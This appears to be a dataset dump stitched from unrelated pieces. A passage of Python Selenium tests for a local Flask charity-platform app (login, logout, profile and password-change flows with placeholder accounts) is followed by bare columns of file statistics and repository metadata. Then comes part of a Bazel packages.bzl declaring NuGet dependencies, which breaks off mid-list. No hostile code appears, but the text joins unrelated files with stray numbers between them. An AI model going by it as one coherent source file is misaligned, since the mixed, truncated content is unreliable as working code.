def test_user_invalid_credentials(self):
self.driver.get("http://127.0.0.1:5000/")
self.driver.set_window_size(1200, 1000)
self.driver.find_element(By.ID, "loginButton").click()
self.driver.find_element(By.CSS_SELECTOR, ".col-4:nth-child(1) .img-fluid").click()
self.driver.find_element(By.ID, "exampleInputEmail1").send_keys("donald@email.com")
self.driver.find_element(By.ID, "exampleInputPassword1").click()
self.driver.find_element(By.ID, "exampleInputPassword1").send_keys("b")
self.driver.find_element(By.CSS_SELECTOR, ".btn-primary").click()
assert 'Dashboard' not in self.driver.title
def test_user_logout(self):
self.driver.get("http://127.0.0.1:5000/")
self.driver.set_window_size(1200, 1000)
self.driver.find_element(By.ID, "loginButton").click()
self.driver.find_element(By.CSS_SELECTOR, ".col-4:nth-child(1) .img-fluid").click()
self.driver.find_element(By.ID, "exampleInputEmail1").send_keys("donald@email.com")
self.driver.find_element(By.ID, "exampleInputPassword1").send_keys("a")
self.driver.find_element(By.ID, "exampleInputPassword1").send_keys(Keys.ENTER)
self.driver.find_element(By.ID, "logoutButton").click()
elements = self.driver.find_elements(By.CSS_SELECTOR, ".alert")
assert len(elements) > 0
# * Org login
def test_org_valid_credentials(self):
self.driver.get("http://127.0.0.1:5000/")
self.driver.set_window_size(1200, 1000)
self.driver.find_element(By.ID, "loginButton").click()
self.driver.find_element(By.CSS_SELECTOR, ".col-4:nth-child(2) .img-fluid").click()
self.driver.find_element(By.ID, "exampleInputEmail1").send_keys("contact@redcrescent.org")
self.driver.find_element(By.ID, "exampleInputPassword1").send_keys("a")
self.driver.find_element(By.ID, "exampleInputPassword1").send_keys(Keys.ENTER)
assert "Dashboard" in self.driver.title
def test_org_invalid_credentials(self):
self.driver.get("http://127.0.0.1:5000/")
self.driver.set_window_size(1200, 1000)
self.driver.find_element(By.ID, "loginButton").click()
self.driver.find_element(By.CSS_SELECTOR, ".col-4:nth-child(2) .img-fluid").click()
self.driver.find_element(By.ID, "exampleInputEmail1").send_keys("contact@redcrescent.org")
self.driver.find_element(By.ID, "exampleInputPassword1").send_keys("b")
self.driver.find_element(By.ID, "exampleInputPassword1").send_keys(Keys.ENTER)
assert "Dashboard" not in self.driver.title
def test_org_logout(self):
self.driver.get("http://127.0.0.1:5000/")
self.driver.set_window_size(1200, 1000)
self.driver.find_element(By.ID, "loginButton").click()
self.driver.find_element(By.CSS_SELECTOR, ".col-4:nth-child(2) .img-fluid").click()
self.driver.find_element(By.ID, "exampleInputEmail1").send_keys("contact@redcrescent.org")
self.driver.find_element(By.ID, "exampleInputPassword1").send_keys("a")
self.driver.find_element(By.ID, "exampleInputPassword1").send_keys(Keys.ENTER)
self.driver.find_element(By.ID, "logoutButton").click()
elements = self.driver.find_elements(By.CSS_SELECTOR, ".alert")
assert len(elements) > 0
# * Viewing own profiles
def test_user_view_profile(self):
self.driver.get("http://127.0.0.1:5000/")
self.driver.set_window_size(1200, 1000)
self.driver.find_element(By.ID, "loginButton").click()
self.driver.find_element(By.CSS_SELECTOR, ".col-4:nth-child(1) .img-fluid").click()
self.driver.find_element(By.ID, "exampleInputEmail1").send_keys("rich@email.com")
self.driver.find_element(By.ID, "exampleInputPassword1").send_keys("a")
self.driver.find_element(By.ID, "exampleInputPassword1").send_keys(Keys.ENTER)
self.driver.find_element(By.LINK_TEXT, "View Profile").click()
assert self.driver.find_element(By.CSS_SELECTOR, ".row:nth-child(3) > .col:nth-child(1) > p").text == "Richy"
def test_org_view_profile(self):
self.driver.get("http://127.0.0.1:5000/")
self.driver.set_window_size(1200, 1000)
self.driver.find_element(By.ID, "loginButton").click()
self.driver.find_element(By.CSS_SELECTOR, ".col-4:nth-child(2) .img-fluid").click()
self.driver.find_element(By.ID, "exampleInputEmail1").send_keys("contact@dubaicares.org")
self.driver.find_element(By.ID, "exampleInputPassword1").send_keys("a")
self.driver.find_element(By.ID, "exampleInputPassword1").send_keys(Keys.ENTER)
self.driver.find_element(By.LINK_TEXT, "View Profile").click()
assert self.driver.find_element(By.CSS_SELECTOR, ".row:nth-child(3) > .col:nth-child(1) > p").text == "Dubai Cares"
# * Test listing organization
def test_viewOrganizationProfileAsUser(self):
self.driver.get("http://127.0.0.1:5000/")
self.driver.set_window_size(1200, 1000)
self.driver.find_element(By.ID, "loginButton").click()
self.driver.find_element(By.CSS_SELECTOR, ".col-4:nth-child(1) .img-fluid").click()
self.driver.find_element(By.ID, "exampleInputEmail1").send_keys("donald@email.com")
self.driver.find_element(By.ID, "exampleInputPassword1").send_keys("a")
self.driver.find_element(By.ID, "exampleInputPassword1").send_keys(Keys.ENTER)
self.driver.find_element(By.CSS_SELECTOR, ".row:nth-child(2) > .col-md-4:nth-child(4) > .btn").click()
self.driver.find_element(By.LINK_TEXT, "View Profile").click()
assert self.driver.find_element(By.CSS_SELECTOR, ".display-1").text == "Red Crescent"
def test_viewOrganizationProfileLoggedOut(self):
self.driver.get("http://127.0.0.1:5000/")
self.driver.set_window_size(1200, 1000)
self.driver.find_element(By.LINK_TEXT, "Organizations").click()
self.driver.find_element(By.CSS_SELECTOR, ".card:nth-child(3) .btn").click()
assert self.driver.find_element(By.CSS_SELECTOR, ".display-1").text == "UAE Aid"
# * Test editing own information
def test_testUserChangingInfo(self):
self.driver.get("http://127.0.0.1:5000/")
self.driver.set_window_size(1200, 1053)
self.driver.find_element(By.ID, "loginButton").click()
self.driver.find_element(By.CSS_SELECTOR, ".col-4:nth-child(1) .img-fluid").click()
self.driver.find_element(By.ID, "exampleInputEmail1").send_keys("jake@email.com")
self.driver.find_element(By.ID, "exampleInputPassword1").send_keys("a")
self.driver.find_element(By.CSS_SELECTOR, ".btn-primary").click()
self.driver.find_element(By.LINK_TEXT, "View Profile").click()
self.driver.find_element(By.LINK_TEXT, "Edit Profile").click()
WebDriverWait(self.driver, 30000).until(expected_conditions.element_to_be_clickable((By.ID, "validationTooltip04")))
self.driver.find_element(By.ID, "validationTooltip04").click()
dropdown = self.driver.find_element(By.ID, "validationTooltip04")
dropdown.find_element(By.XPATH, "//option[. = 'Dubai']").click()
element = self.driver.find_element(By.ID, "PO-BOX")
actions = ActionChains(self.driver)
actions.double_click(element).perform()
self.driver.find_element(By.ID, "PO-BOX").send_keys("990099")
self.driver.find_element(By.CSS_SELECTOR, "#edit .btn-primary").click()
assert self.driver.find_element(By.CSS_SELECTOR, ".row:nth-child(8) > .col:nth-child(3) > p").text == "990099"
# ! These should always be last!
def test_testOrgChangingPassword(self):
self.driver.get("http://127.0.0.1:5000/")
self.driver.set_window_size(1200, 1000)
self.driver.find_element(By.ID, "loginButton").click()
self.driver.find_element(By.CSS_SELECTOR, ".col-4:nth-child(2) .img-fluid").click()
self.driver.find_element(By.ID, "exampleInputEmail1").send_keys("contact@redcrescent.org")
self.driver.find_element(By.ID, "exampleInputPassword1").send_keys("a")
self.driver.find_element(By.CSS_SELECTOR, ".btn-primary").click()
self.driver.find_element(By.LINK_TEXT, "View Profile").click()
self.driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
self.driver.find_element(By.CSS_SELECTOR, ".btn-primary:nth-child(1)").click()
WebDriverWait(self.driver, 30000).until(expected_conditions.element_to_be_clickable((By.ID, "validationTooltip07")))
self.driver.find_element(By.ID, "validationTooltip07").send_keys("b")
self.driver.find_element(By.ID, "validationTooltip08").send_keys("b")
self.driver.find_element(By.CSS_SELECTOR, ".btn:nth-child(2)").click()
self.driver.find_element(By.ID, "logoutButton").click()
self.driver.find_element(By.ID, "loginButton").click()
self.driver.find_element(By.CSS_SELECTOR, ".col-4:nth-child(2) .img-fluid").click()
self.driver.find_element(By.ID, "exampleInputEmail1").send_keys("contact@redcrescent.org")
self.driver.find_element(By.ID, "exampleInputPassword1").send_keys("b")
self.driver.find_element(By.CSS_SELECTOR, ".btn-primary").click()
assert self.driver.find_element(By.ID, "intro").text == "Hello, Red Crescent!"
def test_testUserChangingPassword(self):
self.driver.get("http://127.0.0.1:5000/")
self.driver.set_window_size(1200, 1000)
self.driver.find_element(By.ID, "loginButton").click()
self.driver.find_element(By.CSS_SELECTOR, ".col-4:nth-child(1) .img-fluid").click()
self.driver.find_element(By.ID, "exampleInputEmail1").send_keys("donald@email.com")
self.driver.find_element(By.ID, "exampleInputPassword1").send_keys("a")
self.driver.find_element(By.CSS_SELECTOR, ".btn-primary").click()
self.driver.find_element(By.LINK_TEXT, "View Profile").click()
self.driver.find_element(By.CSS_SELECTOR, ".col-md-12 > .btn:nth-child(2)").click()
WebDriverWait(self.driver, 30000).until(expected_conditions.element_to_be_clickable((By.ID, "validationTooltip07")))
self.driver.find_element(By.ID, "validationTooltip07").send_keys("b")
self.driver.find_element(By.ID, "validationTooltip08").send_keys("b")
self.driver.find_element(By.CSS_SELECTOR, "#changePassword .btn-primary").click()
self.driver.find_element(By.ID, "logoutButton").click()
self.driver.find_element(By.ID, "loginButton").click()
self.driver.find_element(By.CSS_SELECTOR, ".col-4:nth-child(1) .img-fluid").click()
self.driver.find_element(By.ID, "exampleInputEmail1").send_keys("donald@email.com")
self.driver.find_element(By.ID, "exampleInputPassword1").send_keys("b")
self.driver.find_element(By.CSS_SELECTOR, ".btn-primary").click()
self.driver.find_element(By.ID, "intro").click()
assert self.driver.find_element(By.ID, "intro").text == "Hello, Donald!"
| 56.186603
| 118
| 0.752874
| 1,736
| 11,743
| 4.937212
| 0.106567
| 0.169175
| 0.176409
| 0.259713
| 0.825341
| 0.822891
| 0.822891
| 0.804924
| 0.786839
| 0.771205
| 0
| 0.033441
| 0.07562
| 11,743
| 209
| 119
| 56.186603
| 0.756149
| 0.023844
| 0
| 0.602151
| 0
| 0.021505
| 0.246268
| 0.058839
| 0
| 0
| 0
| 0
| 0.069892
| 1
| 0.080645
| false
| 0.134409
| 0.069892
| 0
| 0.155914
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
60adee835337db8004368a1f0ef4d70ea3646b4a
| 77,807
|
bzl
|
Python
|
csharp/nuget/packages.bzl
|
kalbasit/rules_proto_grpc
|
7e0a97adc8801df1cd74ee435d74bbd857c98a36
|
[
"Apache-2.0"
] | 1
|
2021-08-11T23:14:07.000Z
|
2021-08-11T23:14:07.000Z
|
csharp/nuget/packages.bzl
|
kalbasit/rules_proto_grpc
|
7e0a97adc8801df1cd74ee435d74bbd857c98a36
|
[
"Apache-2.0"
] | 1
|
2020-04-06T12:24:52.000Z
|
2020-04-06T12:24:52.000Z
|
csharp/nuget/packages.bzl
|
kalbasit/rules_proto_grpc
|
7e0a97adc8801df1cd74ee435d74bbd857c98a36
|
[
"Apache-2.0"
] | 1
|
2020-02-03T20:31:13.000Z
|
2020-02-03T20:31:13.000Z
|
load("@io_bazel_rules_dotnet//dotnet:defs.bzl", "net_gac4", "nuget_package")
def packages():
nuget_package(
name = "npgsql",
package = "npgsql",
version = "4.0.3",
# sha256 = "4e1f91eb9f0c3dfb8e029edbc325175cd202455df3641bc16155ef422b6bfd6f",
core_lib = {
"netstandard2.0": "lib/netstandard2.0/Npgsql.dll",
},
net_lib = {
"net451": "lib/net451/Npgsql.dll",
},
mono_lib = "lib/net45/Npgsql.dll",
core_deps = {},
net_deps = {},
mono_deps = [],
core_files = {
"netstandard2.0": [
"lib/netstandard2.0/Npgsql.dll",
"lib/netstandard2.0/Npgsql.pdb",
"lib/netstandard2.0/Npgsql.xml",
],
},
net_files = {
"net451": [
"lib/net451/Npgsql.dll",
"lib/net451/Npgsql.pdb",
"lib/net451/Npgsql.xml",
],
},
mono_files = [
"lib/net45/Npgsql.dll",
"lib/net45/Npgsql.pdb",
"lib/net45/Npgsql.xml",
],
)
net_gac4(
name = "System.ComponentModel.DataAnnotations",
version = "4.0.0.0",
token = "31bf3856ad364e35",
)
### Generated by the tool
nuget_package(
name = "commandlineparser",
package = "commandlineparser",
version = "2.3.0",
core_lib = {
"netcoreapp2.0": "lib/netstandard1.5/CommandLine.dll",
"netcoreapp2.1": "lib/netstandard1.5/CommandLine.dll",
},
net_lib = {
"net45": "lib/net45/CommandLine.dll",
"net451": "lib/net45/CommandLine.dll",
"net452": "lib/net45/CommandLine.dll",
"net46": "lib/net45/CommandLine.dll",
"net461": "lib/net45/CommandLine.dll",
"net462": "lib/net45/CommandLine.dll",
"net47": "lib/net45/CommandLine.dll",
"net471": "lib/net45/CommandLine.dll",
"net472": "lib/net45/CommandLine.dll",
"netstandard1.5": "lib/netstandard1.5/CommandLine.dll",
"netstandard1.6": "lib/netstandard1.5/CommandLine.dll",
"netstandard2.0": "lib/netstandard1.5/CommandLine.dll",
},
mono_lib = "lib/net45/CommandLine.dll",
net_deps = {
"net461": [
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net461_system.collections.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net461_system.console.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net461_system.diagnostics.debug.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net461_system.globalization.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net461_system.io.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net461_system.linq.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net461_system.linq.expressions.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net461_system.reflection.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net461_system.reflection.extensions.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net461_system.reflection.typeextensions.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net461_system.resources.resourcemanager.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net461_system.runtime.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net461_system.runtime.extensions.dll",
],
"net462": [
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net462_system.collections.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net462_system.console.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net462_system.diagnostics.debug.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net462_system.globalization.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net462_system.io.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net462_system.linq.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net462_system.linq.expressions.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net462_system.reflection.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net462_system.reflection.extensions.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net462_system.reflection.typeextensions.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net462_system.resources.resourcemanager.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net462_system.runtime.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net462_system.runtime.extensions.dll",
],
"net47": [
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net47_system.collections.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net47_system.console.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net47_system.diagnostics.debug.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net47_system.globalization.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net47_system.io.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net47_system.linq.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net47_system.linq.expressions.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net47_system.reflection.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net47_system.reflection.extensions.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net47_system.reflection.typeextensions.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net47_system.resources.resourcemanager.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net47_system.runtime.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net47_system.runtime.extensions.dll",
],
"net471": [
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net471_system.collections.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net471_system.console.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net471_system.diagnostics.debug.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net471_system.globalization.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net471_system.io.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net471_system.linq.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net471_system.linq.expressions.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net471_system.reflection.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net471_system.reflection.extensions.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net471_system.reflection.typeextensions.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net471_system.resources.resourcemanager.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net471_system.runtime.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net471_system.runtime.extensions.dll",
],
"net472": [
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net472_system.collections.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net472_system.console.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net472_system.diagnostics.debug.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net472_system.globalization.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net472_system.io.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net472_system.linq.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net472_system.linq.expressions.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net472_system.reflection.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net472_system.reflection.extensions.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net472_system.reflection.typeextensions.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net472_system.resources.resourcemanager.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net472_system.runtime.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net472_system.runtime.extensions.dll",
],
},
mono_deps = [
"@io_bazel_rules_dotnet//dotnet/stdlib:system.collections.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib:system.console.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib:system.diagnostics.debug.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib:system.globalization.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib:system.io.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib:system.linq.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib:system.linq.expressions.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib:system.reflection.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib:system.reflection.extensions.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib:system.reflection.typeextensions.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib:system.resources.resourcemanager.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib:system.runtime.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib:system.runtime.extensions.dll",
],
core_files = {
"netcoreapp2.0": [
"lib/netstandard1.5/CommandLine.dll",
"lib/netstandard1.5/CommandLine.xml",
],
"netcoreapp2.1": [
"lib/netstandard1.5/CommandLine.dll",
"lib/netstandard1.5/CommandLine.xml",
],
},
net_files = {
"net45": [
"lib/net45/CommandLine.dll",
"lib/net45/CommandLine.XML",
],
"net451": [
"lib/net45/CommandLine.dll",
"lib/net45/CommandLine.XML",
],
"net452": [
"lib/net45/CommandLine.dll",
"lib/net45/CommandLine.XML",
],
"net46": [
"lib/net45/CommandLine.dll",
"lib/net45/CommandLine.XML",
],
"net461": [
"lib/net45/CommandLine.dll",
"lib/net45/CommandLine.XML",
],
"net462": [
"lib/net45/CommandLine.dll",
"lib/net45/CommandLine.XML",
],
"net47": [
"lib/net45/CommandLine.dll",
"lib/net45/CommandLine.XML",
],
"net471": [
"lib/net45/CommandLine.dll",
"lib/net45/CommandLine.XML",
],
"net472": [
"lib/net45/CommandLine.dll",
"lib/net45/CommandLine.XML",
],
"netstandard1.5": [
"lib/netstandard1.5/CommandLine.dll",
"lib/netstandard1.5/CommandLine.xml",
],
"netstandard1.6": [
"lib/netstandard1.5/CommandLine.dll",
"lib/netstandard1.5/CommandLine.xml",
],
"netstandard2.0": [
"lib/netstandard1.5/CommandLine.dll",
"lib/netstandard1.5/CommandLine.xml",
],
},
mono_files = [
"lib/net45/CommandLine.dll",
"lib/net45/CommandLine.XML",
],
)
nuget_package(
name = "newtonsoft.json",
package = "newtonsoft.json",
version = "11.0.2",
core_lib = {
"netcoreapp2.0": "lib/netstandard2.0/Newtonsoft.Json.dll",
"netcoreapp2.1": "lib/netstandard2.0/Newtonsoft.Json.dll",
},
net_lib = {
"net45": "lib/net45/Newtonsoft.Json.dll",
"net451": "lib/net45/Newtonsoft.Json.dll",
"net452": "lib/net45/Newtonsoft.Json.dll",
"net46": "lib/net45/Newtonsoft.Json.dll",
"net461": "lib/net45/Newtonsoft.Json.dll",
"net462": "lib/net45/Newtonsoft.Json.dll",
"net47": "lib/net45/Newtonsoft.Json.dll",
"net471": "lib/net45/Newtonsoft.Json.dll",
"net472": "lib/net45/Newtonsoft.Json.dll",
"netstandard1.0": "lib/netstandard1.0/Newtonsoft.Json.dll",
"netstandard1.1": "lib/netstandard1.0/Newtonsoft.Json.dll",
"netstandard1.2": "lib/netstandard1.0/Newtonsoft.Json.dll",
"netstandard1.3": "lib/netstandard1.3/Newtonsoft.Json.dll",
"netstandard1.4": "lib/netstandard1.3/Newtonsoft.Json.dll",
"netstandard1.5": "lib/netstandard1.3/Newtonsoft.Json.dll",
"netstandard1.6": "lib/netstandard1.3/Newtonsoft.Json.dll",
"netstandard2.0": "lib/netstandard2.0/Newtonsoft.Json.dll",
},
mono_lib = "lib/net45/Newtonsoft.Json.dll",
core_files = {
"netcoreapp2.0": [
"lib/netstandard2.0/Newtonsoft.Json.dll",
"lib/netstandard2.0/Newtonsoft.Json.xml",
],
"netcoreapp2.1": [
"lib/netstandard2.0/Newtonsoft.Json.dll",
"lib/netstandard2.0/Newtonsoft.Json.xml",
],
},
net_files = {
"net45": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
],
"net451": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
],
"net452": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
],
"net46": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
],
"net461": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
],
"net462": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
],
"net47": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
],
"net471": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
],
"net472": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
],
"netstandard1.0": [
"lib/netstandard1.0/Newtonsoft.Json.dll",
"lib/netstandard1.0/Newtonsoft.Json.xml",
],
"netstandard1.1": [
"lib/netstandard1.0/Newtonsoft.Json.dll",
"lib/netstandard1.0/Newtonsoft.Json.xml",
],
"netstandard1.2": [
"lib/netstandard1.0/Newtonsoft.Json.dll",
"lib/netstandard1.0/Newtonsoft.Json.xml",
],
"netstandard1.3": [
"lib/netstandard1.3/Newtonsoft.Json.dll",
"lib/netstandard1.3/Newtonsoft.Json.xml",
],
"netstandard1.4": [
"lib/netstandard1.3/Newtonsoft.Json.dll",
"lib/netstandard1.3/Newtonsoft.Json.xml",
],
"netstandard1.5": [
"lib/netstandard1.3/Newtonsoft.Json.dll",
"lib/netstandard1.3/Newtonsoft.Json.xml",
],
"netstandard1.6": [
"lib/netstandard1.3/Newtonsoft.Json.dll",
"lib/netstandard1.3/Newtonsoft.Json.xml",
],
"netstandard2.0": [
"lib/netstandard2.0/Newtonsoft.Json.dll",
"lib/netstandard2.0/Newtonsoft.Json.xml",
],
},
mono_files = [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
],
)
nuget_package(
name = "nuget.frameworks",
package = "nuget.frameworks",
version = "4.8.0",
core_lib = {
"netcoreapp2.0": "lib/netstandard1.6/NuGet.Frameworks.dll",
"netcoreapp2.1": "lib/netstandard1.6/NuGet.Frameworks.dll",
},
net_lib = {
"net45": "lib/net40/NuGet.Frameworks.dll",
"net451": "lib/net40/NuGet.Frameworks.dll",
"net452": "lib/net40/NuGet.Frameworks.dll",
"net46": "lib/net46/NuGet.Frameworks.dll",
"net461": "lib/net46/NuGet.Frameworks.dll",
"net462": "lib/net46/NuGet.Frameworks.dll",
"net47": "lib/net46/NuGet.Frameworks.dll",
"net471": "lib/net46/NuGet.Frameworks.dll",
"net472": "lib/net46/NuGet.Frameworks.dll",
"netstandard1.6": "lib/netstandard1.6/NuGet.Frameworks.dll",
"netstandard2.0": "lib/netstandard1.6/NuGet.Frameworks.dll",
},
mono_lib = "lib/net46/NuGet.Frameworks.dll",
core_files = {
"netcoreapp2.0": [
"lib/netstandard1.6/NuGet.Frameworks.dll",
"lib/netstandard1.6/NuGet.Frameworks.xml",
],
"netcoreapp2.1": [
"lib/netstandard1.6/NuGet.Frameworks.dll",
"lib/netstandard1.6/NuGet.Frameworks.xml",
],
},
net_files = {
"net45": [
"lib/net40/NuGet.Frameworks.dll",
"lib/net40/NuGet.Frameworks.xml",
],
"net451": [
"lib/net40/NuGet.Frameworks.dll",
"lib/net40/NuGet.Frameworks.xml",
],
"net452": [
"lib/net40/NuGet.Frameworks.dll",
"lib/net40/NuGet.Frameworks.xml",
],
"net46": [
"lib/net46/NuGet.Frameworks.dll",
"lib/net46/NuGet.Frameworks.xml",
],
"net461": [
"lib/net46/NuGet.Frameworks.dll",
"lib/net46/NuGet.Frameworks.xml",
],
"net462": [
"lib/net46/NuGet.Frameworks.dll",
"lib/net46/NuGet.Frameworks.xml",
],
"net47": [
"lib/net46/NuGet.Frameworks.dll",
"lib/net46/NuGet.Frameworks.xml",
],
"net471": [
"lib/net46/NuGet.Frameworks.dll",
"lib/net46/NuGet.Frameworks.xml",
],
"net472": [
"lib/net46/NuGet.Frameworks.dll",
"lib/net46/NuGet.Frameworks.xml",
],
"netstandard1.6": [
"lib/netstandard1.6/NuGet.Frameworks.dll",
"lib/netstandard1.6/NuGet.Frameworks.xml",
],
"netstandard2.0": [
"lib/netstandard1.6/NuGet.Frameworks.dll",
"lib/netstandard1.6/NuGet.Frameworks.xml",
],
},
mono_files = [
"lib/net46/NuGet.Frameworks.dll",
"lib/net46/NuGet.Frameworks.xml",
],
)
nuget_package(
name = "nuget.common",
package = "nuget.common",
version = "4.8.0",
core_lib = {
"netcoreapp2.0": "lib/netstandard1.6/NuGet.Common.dll",
"netcoreapp2.1": "lib/netstandard1.6/NuGet.Common.dll",
},
net_lib = {
"net46": "lib/net46/NuGet.Common.dll",
"net461": "lib/net46/NuGet.Common.dll",
"net462": "lib/net46/NuGet.Common.dll",
"net47": "lib/net46/NuGet.Common.dll",
"net471": "lib/net46/NuGet.Common.dll",
"net472": "lib/net46/NuGet.Common.dll",
"netstandard1.6": "lib/netstandard1.6/NuGet.Common.dll",
"netstandard2.0": "lib/netstandard1.6/NuGet.Common.dll",
},
mono_lib = "lib/net46/NuGet.Common.dll",
core_deps = {
"net46": [
"@nuget.frameworks//:net46_net",
],
"net461": [
"@nuget.frameworks//:net461_net",
],
"net462": [
"@nuget.frameworks//:net462_net",
],
"net47": [
"@nuget.frameworks//:net47_net",
],
"net471": [
"@nuget.frameworks//:net471_net",
],
"net472": [
"@nuget.frameworks//:net472_net",
],
"netstandard1.6": [
"@nuget.frameworks//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.frameworks//:netstandard2.0_net",
],
},
net_deps = {
"net46": [
"@nuget.frameworks//:net46_net",
],
"net461": [
"@nuget.frameworks//:net461_net",
],
"net462": [
"@nuget.frameworks//:net462_net",
],
"net47": [
"@nuget.frameworks//:net47_net",
],
"net471": [
"@nuget.frameworks//:net471_net",
],
"net472": [
"@nuget.frameworks//:net472_net",
],
"netstandard1.6": [
"@nuget.frameworks//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.frameworks//:netstandard2.0_net",
],
},
mono_deps = [
"@nuget.frameworks//:mono",
],
core_files = {
"netcoreapp2.0": [
"lib/netstandard1.6/NuGet.Common.dll",
"lib/netstandard1.6/NuGet.Common.xml",
],
"netcoreapp2.1": [
"lib/netstandard1.6/NuGet.Common.dll",
"lib/netstandard1.6/NuGet.Common.xml",
],
},
net_files = {
"net46": [
"lib/net46/NuGet.Common.dll",
"lib/net46/NuGet.Common.xml",
],
"net461": [
"lib/net46/NuGet.Common.dll",
"lib/net46/NuGet.Common.xml",
],
"net462": [
"lib/net46/NuGet.Common.dll",
"lib/net46/NuGet.Common.xml",
],
"net47": [
"lib/net46/NuGet.Common.dll",
"lib/net46/NuGet.Common.xml",
],
"net471": [
"lib/net46/NuGet.Common.dll",
"lib/net46/NuGet.Common.xml",
],
"net472": [
"lib/net46/NuGet.Common.dll",
"lib/net46/NuGet.Common.xml",
],
"netstandard1.6": [
